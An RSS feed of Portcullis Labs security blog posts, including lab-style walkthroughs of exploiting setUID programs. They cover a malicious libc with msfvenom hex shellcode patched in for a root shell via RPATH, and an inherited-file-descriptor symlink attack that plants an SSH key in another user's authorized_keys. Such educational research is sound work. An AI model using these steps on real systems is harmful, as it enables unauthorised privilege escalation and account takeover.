Portcullis Labs » analysis https://labs.portcullis.co.uk Research and Development en-US hourly 1 http://wordpress.org/?v=3.8.5 An offensive introduction to Active Directory on UNIX https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/ https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/#comments Thu, 06 Dec 2018 09:18:36 +0000 https://labs.portcullis.co.uk/?p=6805 By way of an introduction to our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises’ Active Directory forests. Background to Active Directory integration […]

The post An offensive introduction to Active Directory on UNIX appeared first on Portcullis Labs.

]]>
By way of an introduction to our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises’ Active Directory forests.

Background to Active Directory integration solutions

Having seen an uptick in unique UNIX infrastructures that are integrated into customers’ existing Active Directory forests, the question becomes, “Does this present any concerns that may not be well understood?” This quickly became “What if an adversary could get into a UNIX box and then breach your domain?”
Within a typical Active Directory integration solution (in this case SSSD), the solution shares a striking similarity to what a user might see on Windows. Notably, you have:

  • DNS – Used for name resolution
  • LDAP – Used for “one-time identification” and assertion of identity
  • Kerberos – Used for ongoing authentication
  • SSSD – Like LSASS
  • PAM – Like msgina.dll or the more modern credential providers

You can see a breakdown of this process here. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.

Our research

Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. Having worked with a variety of customers, it becomes apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. While we’ve been talking about successful attacks against components such as LSASS and Kerberos for quite some time, Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer. Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor how a blue team might spot an adversary performing them.

As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing appropriate strategies to allow blue teams to appropriately detect and respond to such incursions. The Black Hat EU slides can be found here and whilst the tools we developed can be found on our GitHub repo.

The post An offensive introduction to Active Directory on UNIX appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/feed/ 0
Where 2 worlds collide: Bringing Mimikatz et al to UNIX https://labs.portcullis.co.uk/presentations/where-2-worlds-collide-bringing-mimikatz-et-al-to-unix/ https://labs.portcullis.co.uk/presentations/where-2-worlds-collide-bringing-mimikatz-et-al-to-unix/#comments Thu, 06 Dec 2018 08:04:06 +0000 https://labs.portcullis.co.uk/?p=6806 Presentation on Active Directory integration solutions for UNIX (as given at Black Hat Europe 2018). Over the past fifteen years there’s been an uptick in “interesting” UNIX infrastructures being integrated into customers’ existing AD forests. Whilst the threat models enabled by this should be quite familiar to anyone securing a heterogeneous Windows network, they may […]

The post Where 2 worlds collide: Bringing Mimikatz et al to UNIX appeared first on Portcullis Labs.

]]>
Presentation on Active Directory integration solutions for UNIX (as given at Black Hat Europe 2018).

Over the past fifteen years there’s been an uptick in “interesting” UNIX infrastructures being integrated into customers’ existing AD forests. Whilst the threat models enabled by this should be quite familiar to anyone securing a heterogeneous Windows network, they may not be as well understood by a typical UNIX admin who does not have a strong background in Windows and AD. Over the last few months we’ve spent some time looking a number of specific Active Directory integration solutions (both open and closed source) for UNIX systems and documenting some of the tools, tactics and procedures that enable attacks on the forest to be staged from UNIX.

This talk describes the technical details regarding our findings. It includes Proof of Concepts (PoC) showing real-world attacks against AD joined UNIX systems. Finally, potential solutions or mitigation controls are discussed that will help to either prevent those attacks or at the very least to detect them when they occur.

Tools referenced in this talk include:

Eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX
724.9 KiB
MD5 hash: cc712c5e46b16fbff22a2566b1248a91
Details

The post Where 2 worlds collide: Bringing Mimikatz et al to UNIX appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/presentations/where-2-worlds-collide-bringing-mimikatz-et-al-to-unix/feed/ 0
SetUID program exploitation: Crafting shared object files without a compiler https://labs.portcullis.co.uk/blog/setuid-program-exploitation-crafting-shared-object-files-without-a-compiler/ https://labs.portcullis.co.uk/blog/setuid-program-exploitation-crafting-shared-object-files-without-a-compiler/#comments Wed, 31 Oct 2018 12:18:59 +0000 https://labs.portcullis.co.uk/?p=6581 In this post we look at an alternative to compiling shared object files when exploiting vulnerable setUID programs on Linux. At a high level we’re just going to copy the binary and insert some shellcode. First we take a look the circumstances that might lead you to use this option. Also check out this previous post […]

The post SetUID program exploitation: Crafting shared object files without a compiler appeared first on Portcullis Labs.

]]>
In this post we look at an alternative to compiling shared object files when exploiting vulnerable setUID programs on Linux. At a high level we’re just going to copy the binary and insert some shellcode. First we take a look the circumstances that might lead you to use this option. Also check out this previous post on setUID exploitation.

A hacker challenge gone wrong

A long time ago, I set my team challenge of identifying an RPATH vulnerability and (if possible) exploiting the vulnerability to run some code of their choosing with higher privileges. I named my program arp-ath – lest people wasted too much time looking for other attack vectors:

$ cat arp-ath.c
#include <stdio.h>
int main(void) {
 printf("Hello world\n");
}
$ gcc -Wl,-rpath,. -o arp-ath arp-ath.c
# chmod 4755 arp-ath

The program behaves as you’d expect and is linked to libc.so.6 as you’d expect:

$ ./arp-ath
Hello world
$ ldd arp-ath
 linux-vdso.so.1 => (0x00007fff0a3fd000)
 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb6dc0d6000)
 /lib64/ld-linux-x86-64.so.2 (0x00007fb6dc489000)

The vulnerability lies in the fact the program seaches the current directory for its libraries:

$ readelf -a arp-ath | grep -i path
0x000000000000000f (RPATH) Library rpath: [.]

(You’ll sometimes see RUNPATH instead of RPATH, but both work). Check it’s vulnerable like this:

$ touch libc.so.6
$ ./arp-ath
./arp-ath: error while loading shared libraries: ./libc.so.6: file too short

This challenge is very similar to Level 15 of the Nebula challenge if you want to play along using that – though it’s 32-bit.

The team found the “arp-ath” vulnerability pretty quickly and replied to let me know. Which you’d expect as it is their job to find such vulnerabilities on client systems during Build Reviews.

What I hadn’t personally anticipated is what a pain it is to create a malicious modified version of libc.so.6 on 64-bit Linux. So rather than face the embarrassment of having posted a challenge that I didn’t actually have a full solution for, I cobbled together the shellcode-based solution outlined above. First let’s have a look at the difficulties I had in creating my own libc.so.6.

Problems compiling a replacement libc.so.6 on 64-bit Linux

I lost my original notes of what I’d tried, but I’m pretty sure that I and my colleagues followed a similar path to this solution to the Nebula level 15 challenge - which has a really nice writeup of how to debug shared libraries that don’t want to work.

Here’s an initial attempt, which should cause a shell to spawn when the library is loaded (note I could also have replaced the “puts” function).

$ cat exploit1.c
#include <stdlib.h>
int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
 system("/bin/sh");
}
$ gcc -fPIC -shared -o libc.so.6 exploit1.c
$ ldd ./arp-ath
./arp-ath: ./libc.so.6: no version information available (required by ./arp-ath)
./arp-ath: ./libc.so.6: no version information available (required by ./libc.so.6)
linux-vdso.so.1 (0x00007ffeea77d000)
libc.so.6 => ./libc.so.6 (0x00007f50430f9000)
$ ./arp-ath
./arp-ath: ./libc.so.6: no version information available (required by ./arp-ath)
./arp-ath: ./libc.so.6: no version information available (required by ./libc.so.6)
./arp-ath: relocation error: ./libc.so.6: symbol __cxa_finalize, version GLIBC_2.2.5 not defined in file libc.so.6 with link time reference

So, let’s address those errors about lack of version numbers and failure to export __cxa_finalize (after much googling)…

$ cat version
GLIBC_2.2.5{};
$ cat exploit2.c
#include <stdlib.h>

void __cxa_finalize (void *d) {
 return;
}

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
 system("/bin/sh");
}
$ gcc -fPIC -shared -Wl,--version-script=version -o libc.so.6 exploit2.c
$ ./arp-ath
./arp-ath: relocation error: ./libc.so.6: symbol system, version GLIBC_2.2.5 not defined in file libc.so.6 with link time reference

Hmm. More errors.

Cutting short a very long sequence of trial and error, when we eventually try to replicate the solution to the Nubula level 15 challenge on 64-bit, we find that it only seems to work for 32-bit:

gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 exploit2.c
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libc.a(system.o): relocation R_X86_64_32 against `.bss' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libc.a(sysdep.o): relocation R_X86_64_TPOFF32 against symbol `errno' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libc.a(sigaction.o): relocation R_X86_64_32S against `.text' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: final link failed: Nonrepresentable section on output
collect2: error: ld returned 1 exit status

If I understood my googling correctly, I need a version of libc that’s been compiled with -fPIC, but that’s not possible for some reason I didn’t understand.

I did consider grabbing the source for libc and recompiling it after a modification, but decided life was too short. I had a better (or at least quicker) idea…

So just use metasploit, then?

I had a quick go at generating a shared object file with msfvenom:

msfvenom -a x64 -f elf-so -p linux/x64/exec CMD=/bin/sh AppendExit=true > libc.so.6
$ ./arp-ath
./arp-ath: ./libc.so.6: no version information available (required by ./arp-ath)
./arp-ath: symbol lookup error: ./arp-ath: undefined symbol: __libc_start_main, version GLIBC_2.2.5

This was awfully familiar. I didn’t grapple much more with msfvenom after this.

Patching shellcode into a copy of libc.so.6

I figured I could open up a copy of libc.so.6 in a hex editor and paste in some shellcode over the top of __libc_start_main function. No matter how horribly I corrupted the file or how badly it crashed after it executed my shellcode, at least I’d have my shell.

I grabbed some shellcode off the internet – but equally could have generated in it Metasploit like this (I also appended a call to exit to stop the inevitable crash I mentioned):

$ msfvenom -a x64 -f hex -p linux/x64/exec CMD=/bin/sh AppendExit=true
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 55 bytes
Final size of hex file: 110 bytes
6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e8080000002f62696e2f73680056574889e60f054831ff6a3c580f05

Then I made a copy of libc.so.6 and located the file offset for the __libc_start_main function:

$ cp /lib/x86_64-linux-gnu/libc.so.6 .
$ objdump -FD libc.so.6 | grep _main
00000000000201f0 <__libc_start_main@@GLIBC_2.2.5> (File Offset: 0x201f0):
...

Using a hexeditor I pasted in the shellcode.

</span>
<pre>$ hexedit libc.so.6
Use CTRL-G to seek to the offset in the file
image-6582

Use CTRL-G to seek to the offset in the file

(CTRL-G to go to an offset (0x201f0); paste in our shellcode; F2 to save; CTRL-C to quit.)

Shellcode pasted over existing code
image-6583

Shellcode pasted over existing code

$ ./arp-ath
# id
uid=1000(x) gid=1000(x) euid=0(root) groups=1000(x)

Finally! :-)

And this works on AIX too?

I tried to get this working on AIX – which typically doesn’t have a C compiler available; AND typically has loads of RPATH vulnerabilities. However, the shellcode I tried was self-modifying. This is fine when you’re injecting shellcode as data, but the code section I was injecting into was read-only. So I got a segfault. I’ll follow up if get this working.

Conclusion

The quick and dirty solution, while inevitably unsatisfactory is sometimes sufficient. Especially given the lack of tools, source, time you might have when exploiting this sort of vulnerabilities. Maybe it’s not a terrible solution. You be the judge.

The post SetUID program exploitation: Crafting shared object files without a compiler appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/setuid-program-exploitation-crafting-shared-object-files-without-a-compiler/feed/ 0
Exploiting inherited file handles in setUID programs https://labs.portcullis.co.uk/blog/exploiting-inherited-file-handles-in-setuid-programs/ https://labs.portcullis.co.uk/blog/exploiting-inherited-file-handles-in-setuid-programs/#comments Thu, 28 Jun 2018 16:00:40 +0000 https://labs.portcullis.co.uk/?p=6538 In this post we look at at one of many security problems that pentesters and security auditors find in setUID programs. It’s fairly common for child processes to inherit any open file handles in the parent process (though there are ways to avoid this). In certain cases this can present a security flaw. This is […]

The post Exploiting inherited file handles in setUID programs appeared first on Portcullis Labs.

]]>
In this post we look at at one of many security problems that pentesters and security auditors find in setUID programs. It’s fairly common for child processes to inherit any open file handles in the parent process (though there are ways to avoid this). In certain cases this can present a security flaw. This is what we’ll look at in the context of setUID programs on Linux.

I was reminded of this technique as I tackled an old hacker challenge recently. This a fun challenge. And there’s a much easier solution than using the technique I’m going to cover here. Maybe try both the hard way and the easy way.

Example program

Here’s a fairly minimal test case of example code – inspired by the nebula challenge code.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 char *cmd = argv[1];
 char tmpfilepath[] = "/tmp/tmpfile";  // Modern systems need "sysctl fs.protected_symlinks=0" or "chmod 0777 /tmp" for this to be vulnerable to the symlink attack we'll use later.
 char data[] = "pointless data\n";

int fd = open(tmpfilepath, O_CREAT|O_RDWR, 0600);
 unlink(tmpfilepath);
 write(fd, data, strlen(data));
 setuid(getuid());
 system(cmd);
}

Let’s start by compiling this and setting the setUID bit so we have an example to work with:

root@challenge:/# useradd -m tom # victim/target user
root@challenge:/# useradd -m bob # attacker
root@challenge:/# cd ~bob
root@challenge:/home/bob# cp /share/fd-leak.c .
root@challenge:/home/bob# gcc -o fd-leak fd-leak.c
root@challenge:/home/bob# chown tom:tom fd-leak
root@challenge:/home/bob# chmod 4755 fd-leak
root@challenge:/home/bob# ls -l fd-leak
-rwsr-xr-x 1 root root 8624 Apr 12 11:06 fd-leak
root@challenge:/home/bob# su - bob
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)

For exploitation later, we’ll also need the target user (tom in this case) to have a .ssh directory in their home directory:

root@challenge:/# mkdir ~tom/.ssh; chown tom:tom ~tom/.ssh

What this program lacks in realism is hopefully made up for in its simplicity.

Normal operation

As can be seen from the code above, the program should:

  1. Create the file /tmp/tmpfile, then delete it. A file descriptor is retained
  2. Drop privileges. This is poor code for dropping privileges, btw. It suffices for this example, though
  3. Run a command that is supplied as an argument. It should run as the invoking user, not as the target user (tom)

Let’s try it out (note that I modify .bashrc to make it clearer to the reader when a subshell has been spawned):

root@challenge:/home/bob# su - bob
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ echo 'echo subshell...' > .bashrc
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ ./fd-leak bash -p
subshell...
bob@challenge:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
root@challenge:/home/bob# useradd -m tom
root@challenge:/home/bob# su - tom
$ mkdir .ssh
$ ls -la
total 28
drwxr-xr-x 3 tom tom 4096 Apr 12 11:42 .
drwxr-xr-x 2 tom tom 4096 Apr 12 11:42 .ssh
...

So, yes fd-leak appears to drop privileges. (Our spawned shell isn’t responsible for the drop in privileges as I’ve hopefully illustrated by passing -p to bash above and by running id directly).

Finally, we expect the child process to inherit a file handle to the now deleted file /tmp/tmpfile:

bob@challenge:~$ ls -l /proc/self/fd
total 0
lrwx------ 1 bob bob 64 Apr 12 11:22 0 -> /dev/pts/2
lrwx------ 1 bob bob 64 Apr 12 11:22 1 -> /dev/pts/2
lrwx------ 1 bob bob 64 Apr 12 11:22 2 -> /dev/pts/2
lrwx------ 1 bob bob 64 Apr 12 11:22 3 -> '/tmp/tmpfile (deleted)'
lr-x------ 1 bob bob 64 Apr 12 11:22 4 -> /proc/53982/fd

It does. We’re all set.

High level exploit path

Our approach to attacking this vulnerable program will follow these high level steps which are covered in more detail in the sections below:

  1. Create a symlink that the vulnerable code will try to write to. This way we can create a file in a location of our choosing and with a name we choose. We’ll choose ~tom/.ssh/authorized_keys
  2. We’ll run some code in the context of a child process to manipulate the open file handle so we can write the contents of authorized_keys file
  3. Finally, we log with via SSH

Practical exploitation

Step 1: Symlink attack

Simple:

ln -s ~tom/.ssh/authorized_keys /tmp/tmpfile

This step was harder in the nebula challenge, but I didn’t want to cloud the issue.

If we run the code now, we see that the authorized_keys file is created, but we don’t control the contents.

bob@challenge:~$ ls -l ~tom/.ssh/authorized_keys
-rw------- 1 tom bob 15 Apr 12 12:12 /home/tom/.ssh/authorized_keys
bob@challenge:~$ ln -s ~tom/.ssh/authorized_keys /tmp/tmpfile
ln: failed to create symbolic link '/tmp/tmpfile': File exists
bob@challenge:~$ ls -l /tmp/tmpfile
lrwxrwxrwx 1 bob bob 30 Apr 12 12:11 /tmp/tmpfile -> /home/tom/.ssh/authorized_keys
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ ls -l ~tom/.ssh/authorized_keys
-rw------- 1 tom bob 15 Apr 12 12:12 /home/tom/.ssh/authorized_keys

We also don’t control the permissions the file gets created with. (Feel free to try the above on authorized_keys2 after running “umask 0″ to check).

Step 2: Running code in child process

It’s pretty easy to run code because of the nature of the program. Again, this was harder in the nebula challenge. We can see the file handle we want listed in /proc/self/fd. It’s file descriptor 3:

bob@challenge:~$ ln -s ~tom/.ssh/authorized_keys /tmp/tmpfile

bob@challenge:~$ ls -l /tmp/tmpfile
lrwxrwxrwx 1 bob bob 30 Apr 12 12:25 /tmp/tmpfile -> /home/tom/.ssh/authorized_keys
bob@challenge:~$ ./fd-leak bash
subshell...
bob@challenge:~$ ls -l /proc/self/fd
total 0
lrwx------ 1 bob bob 64 Apr 12 12:26 0 -> /dev/pts/1
lrwx------ 1 bob bob 64 Apr 12 12:26 1 -> /dev/pts/1
lrwx------ 1 bob bob 64 Apr 12 12:26 2 -> /dev/pts/1
lrwx------ 1 bob bob 64 Apr 12 12:26 3 -> /home/tom/.ssh/authorized_keys
lr-x------ 1 bob bob 64 Apr 12 12:26 4 -> /proc/54947/fd

So we can just “echo key > /proc/self/fd/3″? Not really. That’s just a symlink. A symlink to a file that doesn’t exist to be precise. And it’s pointing to a location that we’d don’t have privileges to create. Let’s confirm that:

bob@challenge:~$ ls -l /home/tom/.ssh/authorized_keys
-rw------- 1 tom bob 15 Apr 12 12:25 /home/tom/.ssh/authorized_keys
bob@challenge:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ echo > /home/tom/.ssh/authorized_keys
bash: /home/tom/.ssh/authorized_keys: Permission denied
bob@challenge:~$ echo > /tmp/tmpfile
bash: /tmp/tmpfile: Permission denied
bob@challenge:~$ echo > /proc/self/fd/3
bash: /proc/self/fd/3: Permission denied

We need to write to file descriptor 3… So is there are version of cat that works with file descriptors? Not that I know of. Let’s write some small utilities that will help us get to grips with accessing inherited file handles. We’ll write 3 tools:

  • read – that uses the read function to read a set number of bytes from a particular file descriptor
  • write – that writes a string of our choosing to a particular file descriptor
  • lseek – that lets us position our read/write

Here’s the source and compilation of the (very crude) demo tools:

bob@challenge:~$ cat read.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 char buf[1024];
 memset(buf, 0, 1024);
 int r = read(atoi(argv[1]), buf, 10);
 printf("Read %d bytes\n", r);
 write(1, buf, 10);
}

bob@challenge:~$ gcc -o read read.c
bob@challenge:~$ cat write.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 printf("writing %s to fd %s\n", argv[2], argv[1]);
 write(atoi(argv[1]), argv[2], strlen(argv[2]));
}
bob@challenge:~$ gcc -o write write.c
bob@challenge:~$ cat lseek.c
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 printf("seek to position %s on fd %s\n", argv[2], argv[1]);
 lseek(atoi(argv[1]), atoi(argv[2]), SEEK_SET);
}

bob@challenge:~$ gcc -o lseek lseek.c

Let’s see the tools in action. First we try to read, then write to file descriptor 3, but the read always returns 0 bytes:

bob@challenge:~$ ./read 3
Read 0 bytes
bob@challenge:~$ ./write 3 hello
writing hello to fd 3
bob@challenge:~$ ./read 3
Read 0 bytes

The reason is that we need to seek to a location in the file that isn’t the end of the file. Let’s seek to position 0, the beginning of the file:

bob@challenge:~$ ./lseek 3 0
seek to position 0 on fd 3
bob@challenge:~$ ./read 3
Read 10 bytes
pointless bob@challenge:~$ ./read 3
Read 10 bytes
data
hellobob@challenge:~$ ./read 3
Read 0 bytes

Much better.

Finally we need exploit the program above. We have two choices:

  • Run a shell as before, then use our new tool to write the key to authorized_keys; or
  • Make a new tool using the functions shown above to write to authorized_keys.

Let’s do the former. The latter is an exercise for the reader. Note that we need to seek to position 0 before we write our data. It’s important to overwrite the “pointless” message already there as that corrupts the authorized_keys file:

bob@challenge:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/bob/.ssh/id_rsa): bobkey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in bobkey.
Your public key has been saved in bobkey.pub.
bob@challenge:~$ cat bobkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2PezJjFSI778OvONA5aqfM2Y2d0eYizOkcqTimy7dXfaEhSKnRSRyfwOfwOOaVpLdZW9NmfaPd5G8RY3n+3QwDIPv4Aw5oV+5Q3C3FRG0oZoe0NqvcDN8NeXZFbzvcWqrnckKDmm4gPMzV1rxMaRfFpwjhedyai9iw5GtFOshGZyCHBroJTH5KQDO9mow8ZxFKzgt5XwrfMzvBd+Mf7kE/QtD40CeoNP+GsvNZESxMC3pWfjZet0p7Jl1PpW9zAdN7zaQPH2l+GHzvgPuZDgn+zLJ4CB69kGkibEeu1c1T80dqDDL1DkN1+Kbmop9/5gzOYsEmvlA4DQC6nO9NCTb bob@challenge
bob@challenge:~$ ls -l bobkey.pub
-rw-r--r-- 1 bob bob 387 Apr 12 12:30 bobkey.pub
bob@challenge:~$ ./lseek 3 0
seek to position 0 on fd 3
bob@challenge:~$ ./write 3 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2PezJjFSI778OvONA5aqfM2Y2d0eYizOkcqTimy7dXfaEhSKnRSRyfwOfwOOaVpLdZW9NmfaPd5G8RY3n+3QwDIPv4Aw5oV+5Q3C3FRG0oZoe0NqvcDN8NeXZFbzvcWqrnckKDmm4gPMzV1rxMaRfFpwjhedyai9iw5GtFOshGZyCHBroJTH5KQDO9mow8ZxFKzgt5XwrfMzvBd+Mf7kE/QtD40CeoNP+GsvNZESxMC3pWfjZet0p7Jl1PpW9zAdN7zaQPH2l+GHzvgPuZDgn+zLJ4CB69kGkibEeu1c1T80dqDDL1DkN1+Kbmop9/5gzOYsEmvlA4DQC6nO9NCTb bob@challenge'
 writing ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2PezJjFSI778OvONA5aqfM2Y2d0eYizOkcqTimy7dXfaEhSKnRSRyfwOfwOOaVpLdZW9NmfaPd5G8RY3n+3QwDIPv4Aw5oV+5Q3C3FRG0oZoe0NqvcDN8NeXZFbzvcWqrnckKDmm4gPMzV1rxMaRfFpwjhedyai9iw5GtFOshGZyCHBroJTH5KQDO9mow8ZxFKzgt5XwrfMzvBd+Mf7kE/QtD40CeoNP+GsvNZESxMC3pWfjZet0p7Jl1PpW9zAdN7zaQPH2l+GHzvgPuZDgn+zLJ4CB69kGkibEeu1c1T80dqDDL1DkN1+Kbmop9/5gzOYsEmvlA4DQC6nO9NCTb bob@challenge to fd 3

Step 3: Logging in via SSH

bob@challenge:~$ ssh -i bobkey tom@localhost
$ id
uid=1002(tom) gid=1002(tom) groups=1002(tom)

We’re done. We exploited the leaked file descriptor to write data of our choosing to tom’s authorized_keys file. We used a slightly unrealistic symlink attack along the way, but that doesn’t invalidate our discussion of how to use and abuse leaked file descriptors.

Conclusion

Hacker challenges are fun. Even when you accidentally find a much harder solution and waste 10 times longer than necessary.

Writing secure setUID programs can be difficult. Particularly if you spawn child processes; particularly if you use open() in directories writable by other users. fs.protected_symlinks provides some mitigation for directories with the sticky bit set.

The post Exploiting inherited file handles in setUID programs appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/exploiting-inherited-file-handles-in-setuid-programs/feed/ 0
Web Application Whitepaper https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/ https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/#comments Wed, 06 Sep 2017 11:12:46 +0000 https://labs.portcullis.co.uk/?p=6078 This document aims to analyse and explore data collected from technical assurance engagements during 2016. The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP however due to time constraints, our data points were not […]

The post Web Application Whitepaper appeared first on Portcullis Labs.

]]>
This document aims to analyse and explore data collected from technical assurance engagements during 2016.

The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP however due to time constraints, our data points were not submitted. As a result, the co-authors (Simone and Isa) chose to compare the EMEAR team’s statistics from 2016 against the now public 2017 Top 10 published by OWASP. Additionally, they also took a look at the most common web application issues reported by the Team during the last year and analysed their impact and severity.

WAW
WAW.pdf
September 6, 2017
Version: 1.0
925.6 KiB
MD5 hash: 0986d3ab7f6f55c71199296189ce5f62
Details

The post Web Application Whitepaper appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/feed/ 0
Is your sign signed? https://labs.portcullis.co.uk/blog/is-your-sign-signed/ https://labs.portcullis.co.uk/blog/is-your-sign-signed/#comments Thu, 03 Aug 2017 16:30:01 +0000 https://labs.portcullis.co.uk/?p=6002 Modern autonomous vehicles use a number of sensors to analyse their surroundings and act upon changes in their environment. A brilliant idea in theory, but how much of this sensory information can we actually trust? Cisco’s Security Advisory R&D team, a.k.a. Portcullis Labs, decided to investigate further. Various researchers have documented attacks against vehicle sensors […]

The post Is your sign signed? appeared first on Portcullis Labs.

]]>
Modern autonomous vehicles use a number of sensors to analyse their surroundings and act upon changes in their environment. A brilliant idea in theory, but how much of this sensory information can we actually trust? Cisco’s Security Advisory R&D team, a.k.a. Portcullis Labs, decided to investigate further.

Various researchers have documented attacks against vehicle sensors and cyber-physical systems resulting in the vehicle performing unwanted actions, such as falsifying alerts, malfunction and even causing the vehicle to crash. The very same sensors which are used to improve driver efficiency have been proven vulnerable to both spoofing and signal jamming attacks. In this blog entry, we will be focusing on the reliability of a vehicle’s underlying systems, it’s susceptibility to spoofing attacks, and in particular the vulnerabilities in the front-facing camera, to ascertain how these problems may be addressed.

The problem

Multiple cameras can be found in today’s vehicles, some of which provide a full 360 view of their surroundings. One of the most common uses for these cameras is for road traffic sign detection. The traffic sign is picked up by the vehicle’s camera and displayed at eye level within the instrument cluster for the driver’s convenience. This is designed to reduce the potential consequences of a driver failing to recognise a traffic sign.

Professors from Zhejiang University and the University of South Carolina recently presented a whitepaper detailing the countless attack scenarios against vehicle sensors and front-facing cameras. With regards to vehicle cameras, their experiment focused on blinding the camera using multiple easily obtained light sources, which proved to be successful.

Our experiment, on the other hand, looked into fooling the vehicle’s camera in order to present false information to the driver.

We started off by printing different highway speed signs on plain paper, some of which contained arbitrary values, such as null bytes (%00) and letters. The print-outs were then held up by hand as our test vehicle closely drove past. As expected, the camera detected our improvised road signs and displayed the value to the driver. Spoofing speed values of up to 130 mph was possible, despite being way beyond the nation’s speed limit. Does this mean we can now exceed the speed limit? Naturally, abiding by the highway code still comes first, but it does beg the question of why something this farcical can still occur.

Sign Signed

Although one could argue that the camera has done its job and detected what appears to be a valid road sign, there are no additional checks being performed to distinguish whether the detected sign is legitimate or even sensible.

Other scenarios to consider involve the use of intelligent speed limiters which are now present in some vehicles. Both the front-facing camera and built in speed limiter are used to limit your driving speed to the speed sign recognised by the camera, preventing you from exceeding the limit even if you were to floor the accelerator. In a car with that functionality, what would happen if a 20 mph sign was spoofed onto the camera while driving on a 70 mph limit motorway? We are yet to test this specific scenario, but a potentially dangerous outcome is easy to imagine.

What could be done to mitigate this problem?

We need some form of validation against sensory input. If we review and compare the advancements in securing biometrics, specifically fingerprint authentication devices, we can see that these devices are constantly bettered by incorporating new features, such as “life detection”, which detects the subtle conductivity a finger possesses thus preventing spoofing and finger cloning attacks. Could we implement a similar approach to securing vehicle sensors? Proper validation of the authenticity of each detected road sign would enable us to prevent spoofing attacks from occurring, but of course it is easier said than done.

What about introducing boundary detection? UK drivers know that 70mph is the absolute speed limit within the country, therefore the detection of speeds higher that this should be flagged as an error. A fixed boundary detection could, of course, prove unhelpful when driving in Europe, for example, where the speed limits are different, but this is easily fixed using GPS data or functionality enabling the driver to manually set the location as opposed to a global speed limit.

Independent researchers have even suggested novel ways to improve road sign detection systems using neural networks in order to learn and distinguish properties of legitimate road signs.

Conclusion

We have demonstrated that front-facing vehicle cameras used for traffic sign detection can easily be fooled into recording a false speed limit. While cameras do have an essential place in autonomous vehicles, their integrity and availability properties present a great deal of room for improvement. Even simple features and configuration changes, such as boundary detection, could be applied to increase the accuracy and efficiency of these systems. Further research into securing vehicle cameras needs to be conducted to ensure that spoofing attacks cannot be carried out as trivially as is currently possible.

The post Is your sign signed? appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/is-your-sign-signed/feed/ 0
